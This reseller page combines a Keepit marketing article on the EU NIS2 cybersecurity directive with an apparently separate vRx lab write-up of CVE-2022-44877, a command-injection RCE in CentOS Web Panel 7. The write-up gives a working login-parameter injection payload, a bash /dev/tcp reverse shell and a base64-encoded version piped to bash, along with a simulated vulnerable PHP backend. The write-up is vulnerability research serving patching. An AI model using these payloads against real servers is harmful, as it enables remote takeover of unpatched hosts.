2023-01-27 - Version 2

What Is the NIS2 Directive?

On November 10, 2022 (published on 27 December 2022), the EU Parliament adopted new legislation (the NIS2 Directive) to strengthen EU-wide cybersecurity resilience which includes, among other requirements, a crystal-clear requirement for backup and disaster recovery.

The Network and Information Security Directive (NIS2) is a response to the increased exposure of Europe to cyberthreats and the fact that the more interconnected we are, the more we are vulnerable to malicious cyber activity. The regulators hereby set consistent rules for companies and ensure that law enforcement and judicial authorities can work effectively and raise the awareness of EU citizens on cybersecurity.

Keepit supports the EU initiative on protecting our digital infrastructure, our sensitive business data, as well as our personal data.

What Is the Purpose of the NIS Directive?

In comparison to the first NIS directive, the purpose of the NIS2 Directive is to expand the requirements and sanctioning of cybersecurity to harmonize and streamline the level of security across member states—and with tougher requirements for several sectors.

The European Parliamentary Research Service (EPRS), in a briefing on the NIS2 Directive, tells that due to the fact that cyberattacks are quickly growing in number worldwide, as well as increasing in scale, cost and sophistication, “the Commission has submitted this proposal to replace the original NIS Directive and thereby strengthen the security requirements, address the security of supply chains, streamline reporting obligations, and introduce more stringent supervisory measures and stricter enforcement requirements.”

So what has lead to the need for more requirements? According to the WEF Global Risks Report 2023, it is because:

The ever-increasing intertwining of technologies with the critical functioning of societies is exposing populations to direct domestic threats, including those that seek to shatter societal functioning.

Who Does NIS2 Apply To? Which Sectors and entities?

The directive applies particularly to two categories, with those two being “essential” entities and “important” entities.

The following are classified as essential sectors:

Energy (electricity, district heating, oil, gas, and hydrogen)
Transport (air, rail, water, and road)
Banking (credit institutions)
Financial market infrastructures (marketplaces)
The health sector (healthcare providers and manufacturers of pharmaceuticals, etc.)
Drinking and wastewater
Digital infrastructure (including providers of cloud services, data centers, domain name systems (DNS), top-level domain registries (TLD) and public communication networks)
Information and communication service providers (ICT services)
Providers of managed services and managed security services
Public administration
Space

The ‘important entities’ includes public and private entities within:

Postal and courier services
Waste management
Manufacture, production, and distribution of chemicals
Manufacture, processing, and distribution of food
Production of i.a., electronics, machinery, and motor vehicles
Providers of certain digital services (online marketplaces and search engines and social networking services)
Research (higher education institutions and research institutions).

If you are an entity that provides a service that is essential for the maintenance of critical societal and/or economic activities—for example, a transport company—you are, in the eyes of the law, classified as an “operator of essential services.”

This classification will entail a lot of pressure on your technical and organizational structure and capabilities due to the extensive risk management security you are required by law to implement and maintain.

NIS2 Requirements, Risk Management, and Security Measures

The current NIS Directive requires the covered entities to take appropriate and proportionate technical and organizational measures to manage security risks and limit the damage in the event of a security incident.

The NIS2 Directive continues this requirement and sets out additional requirements for appropriate security measures, which must now include as a minimum:

Policies for risk analysis and information security
Incident handling
Business continuity, such as backup management and disaster recovery and crisis management
Supply chain security, including supplier management/security
Security in connection with the acquisition, development, and maintenance of network and information systems
Policies and procedures for assessing the effectiveness of measures to manage cyber security risks
Guidelines for basic ‘computer hygiene’ and cyber security training
Policies for Use of Cryptography and Encryption
Employee security, access control, and asset management
Securing internal communication systems.

Negotiating and Navigating the NIS2 Directive

A dedicated backup and data management solution can help your organization implement resilient data protection and management services for your SaaS workloads, such as Microsoft 365 and Salesforce.

Keepit offers a suite of services for your SaaS data which can help you comply with the legal requirements of the NIS2 Directive with the overall goal of protecting your business continuity.

However, you need to decide which functions are essential and determine how ready you are to maintain those critical functions after an emergency or a disruption—and finally allocate the available budget accordingly. Read our article: Data Compliance Makes Third-Party Security a Must.

Governance

With the NIS2 Directive, the governance provisions are tightened as the responsibility for violation of the NIS2 Directive is not only imposed on the legal entity but on the management itself.

Thus, management must approve the risk management measures taken by the entity regarding cybersecurity and oversee implementation and maintenance. What’s key to a backup strategy? Read our blog post on the 3-2-1 backup rule here.

To ensure sufficient competencies, management members must regularly follow specific courses to obtain the necessary knowledge, insight, and skills to understand and assess cybersecurity risks and management practices and their impact on the entity’s operations.

Supervision, Enforcement, and Sanctions

According to the NIS2 Directive, the competent national authorities must oversee compliance with the directive’s security and notification requirements based on specific incidents—and the competent authorities are empowered to issue certain orders.

What Are the Costs of Non-compliance?

The competent authority can, among other things, issue warnings and orders and (particularly materially) temporarily suspend or request that a person with management responsibility (CEO or another senior member of management) be temporarily suspended from exercising management functions in the entity.

The NIS2 Directive also tightens the sanction options. In addition to having to ensure that violations are punished with sanctions that are effective, proportionate to the violation, and have a dissuasive effect, the competent authority in the Member States now has the concrete possibility to impose administrative fines if the entity does not comply with the directive’s requirements for risk management measures or reporting obligations.

The administrative fines are as follow:

Essential entities – as a minimum – can be fined up to a maximum of 10 million EUR or 2% of the company’s total global annual revenue.

Important entities – as a minimum – can be fined up to a maximum of 7 million EUR or 1.4% of the company’s total global annual revenue.

When Does It Begin? Timeline and Important Dates

The EU member states will now have 20 months to transpose the new directive into national law. Want to know more about the important dates and the timeline surrounding NIS2 entering into force? Go to https://www.nis-2-directive.com/ to learn more about the important dates.

What Are the Next Steps? Educate with Further Reading

We recommend starting to educate yourself and your organization on the legal requirements and to start mapping for compliance gaps with the requirement for risk management and risk measures. You can read the EU Parliament briefing of the legislation here.

For those wanting an in-depth look into the matter, the European Parliament has shared the full texts adopted regarding this proposal, which can be read in PDF format here.

Beyond the NIS2 Directive, Keepit delivers a solid return on investment beyond the critical compliance requirements. Check out our post entitled “What’s the Return on Investment (ROI) of a cloud backup solution” here.

About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Keepit
At Keepit, we believe in a digital future where all software is delivered as a service. Keepit’s mission is to protect data in the cloud Keepit is a software company specializing in Cloud-to-Cloud data backup and recovery. Deriving from +20 year experience in building best-in-class data protection and hosting services, Keepit is pioneering the way to secure and protect cloud data at scale.

Keepit 2023

Unauthenticated RCE in Centos Control Web Panel 7 (CWP) - CVE-2022–44877

Introduction

Unauthenticated RCE in Centos Web Panel 7 — CWP 7 has been found and registered as CVE-2022–44877.

Version affected Centos Web Panel 7 - < 0.9.8.1147

This is one of the CVEs of the month and based on Greynoise (Check it here) there are 6 unique IPs attempted to exploit this CVE.

Based on Shodan search (check it here) CWP is running on 453,848 servers

Build the lab

Install the system

Setup CentOS 7
Install wget sudo yum -y install wget
Update the system sudo yum -y update
Reboot

Install CWP

Follow these commands:

sudo su
cd /usr/local/src
wget http://centos-webpanel.com/cwp-el7-latest
sh cwp-el7-latest
After the installation is done reboot the system

Downgrade CWP to the vulnerable version

Follow these commands:

cd /usr/local/cwpsrv/htdocs
chattr -i -R /usr/local/cwpsrv/htdocs
wget http://static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1146.zip
unzip -o -q cwp-el7-0.9.8.1146.zip
rm -f cwp-el7-0.9.8.1146.zip
Reboot the system

Login to CWP

Open the link in the browser:http://IP:2030/

The username and password are the root user and the password of the root.

The vulnerability

The vulnerability existed in “login” parameter in the login page

Capture the login request

Now, let’s make a simple test by trying to curl website
Run http simple server python3 -m http.server

replace “login=logout” with login=$(curl${IFS}192.168.1.105:8000)

and here is the request:

While I’m reproducing this vulnerability I noticed something with the authentication.

This is supposed to be “unauthenticated RCE”, but I found out that you still need to know the correct username.

Here are some test cases:

Send the payload with the incorrect username & incorrect password ❌
Send the payload with the incorrect username & correct password ❌
Send the payload with the correct username & incorrect password ✅

Before we go to how to get a reverse shell, let’s explain the payload

Let’s take this payload as an example:

$(curl${IFS}192.168.1.105:8000)

The IFS variable is being used here in a way that it’s being used as a separator between
the curl command and the URL, which is “192.168.1.105:8000”.
The $() operator is used to execute the command inside the parentheses and returns the output. This means that the command is making a request to the specified IP address and port number using, and the output of the request will be returned and can be used in the following commands or assigned to a variable.

The RCE

Here is the reverse shell:

sh -i >& /dev/tcp/192.168.1.105/9001 0>&1

Encode the reverse shell to Base64

c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS85MDAxIDA+JjE=

The final format of the payload:

$(echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS85MDAxIDA+JjE=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)

Start the listener
Send the payload

Receive the connection

Let’s see where the execution happened

Now we know that the login page under admin it’s the vulnerable one.Let’s move to the static analysis

Static Analysis

Open the source code we downloaded from here:

http://static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1146.zip

Unfortunately, this is all that we got.

The source code is encoded with ionCube, it’s easy to decode it or reverse engineer it, and it’s illegal.

We only have one line script here which checks if the IonCube Loader extension is loaded and if not, it attempts to load it dynamically.

Since we don’t have the source code I wanted to get more insight into what the code would look like.

So I started to run more analysis trying to understand the code in the back-end so I can simulate it:

I know that any command execution results getting stored in the logs

The login errors getting recorded in/var/log/cwp_client_login.log

now cat cwp_client_login.log

While I’m doing this I noticed the following:

As we mentioned before, the user should be correct and we are assuming that we don’t know the password.Since this is failed login, the website will redirect the user to log in again.

in this case, the command will not execute ❌

in case we are using Brupsuite, once we send the request the command gets executed ✅

Since the results of the executed commands getting recorded in the log files, I want to analyze the logs.

2023-01-25 20:44:27 root Failed Login from: 192.168.1.107 on: 'https://localhost:2031/login/index.php?login=root'

The “2023–01–25 20:44:27” date and time get changed every time, so this is a variable.
The “root” is the user
“Failed Login from:” This is a message and it’s the same every time
The “192.168.1.107” is the IP of the user who is trying to log in
‘https://localhost:2031/login/index.php?login=root ‘ I’m not sure why it’s “localhost” here, however, what we inject after “login=” it’s getting executed and this changes every time so it’s a variable.

$error = $DATE.$USER."Failed Login form:".$URL

The facts we gathered:

There is a check, if the user is not correct the execution doesn’t work.
When the login error happens the URL with the parameter getting recorded in cwp_client_login.log
The date changes, the user (I’m not sure about it, but it should be a variable as well), the failed login statement, and the user IP.

This brings us to a very interesting conclusion, only IF there is a login error where the user is correct, the URL along with the parameter will be stored in the log file.

we can understand that there is something wrong that happened when the whole URL gets passed and not enough sanitization.

After more reading about this specific CVE, I found that the URL is getting passed to some execution function and that’s how the false attempts are logged

The mentioned technique in the blogs are as follows:

echo "incorrect_enter, IP address, HTTP_request_URI" >> ./wring_entry.log

After I made some tests, I found that unless we passed the payload in this specific way such as:

$(command)
` command `

it won’t execute, so that means there is something else. more searching, and asking questions. I was looking for functions in PHP I may use to sanitize a parameter against command injection. because if they are passing anything to execute a command they are supposed to sanitize the passed parameters first.

I found those two:

escapeshellarg(): This function is used to escape a string to be used as a command-line argument in a shell command. It adds single quotes around the string and escapes any existing single quotes within the string, ensuring that the string is treated as a single argument and is protected against injection attacks.

escapeshellcmd(): This function is used to escape a string that is used as a shell command. It escapes any characters that may be used to inject additional commands into the shell command.

I also found this resource:

https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#what-escapeshellarg-and-escapeshellcmd-really-do

Simulating the back-end code

This is my final conclusion of how the code could look like in the backend:

<?php
if(isset($_POST['login'])) {
    $date_time = date("Y-m-d H:i:s");
    $username = $_POST['username'];
    $password = $_POST['password'];
    $url = $_SERVER['REQUEST_URI'];
    $remote_ip = $_SERVER["REMOTE_ADDR"];
    if($username != "root"){
        echo "You are not authorized to login";
    }
    else {
        if($username == "root") {
            $escapedUrl = escapeshellarg($url);
            system("echo \"" . $date_time . " " . $username . " Successful Login from: " . $remote_ip . " on: " . $escapedUrl . "\" >> cwp_client_login.log");
            echo "Welcome root";
        }
        else {
            echo "Wrong Password or Username!";
        }
    }
}
?>

<form action="" method="post">
    <label for="username">Username:</label>
    <input type="text" name="username" required>
    <br>
    <label for="password">Password:</label>
    <input type="password" name="password" required>
    <br>
    <input type="submit" name="login" value="Login">
</form>

Run the code to test it

php -S ip:port test.php

Send the request

Mitigation

Upgrade CWP to the latest version.

Final thoughts

This is a very simple and easy vulnerability to exploit and that is what makes it more dangerous, however, it’s always interesting and fun to dive deep into the source code and understand the root cause of the vulnerability.

In our case since the code is encoded and it’s illegal to decode it, I tried to give more insight into how this vulnerability might be happening in the backend therefore I needed to conduct a lot more analysis and tests, also go through tons of researching and asking questions.

Resources:

#CVE-2022-44877 #CWP #RCE

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

vRx 2023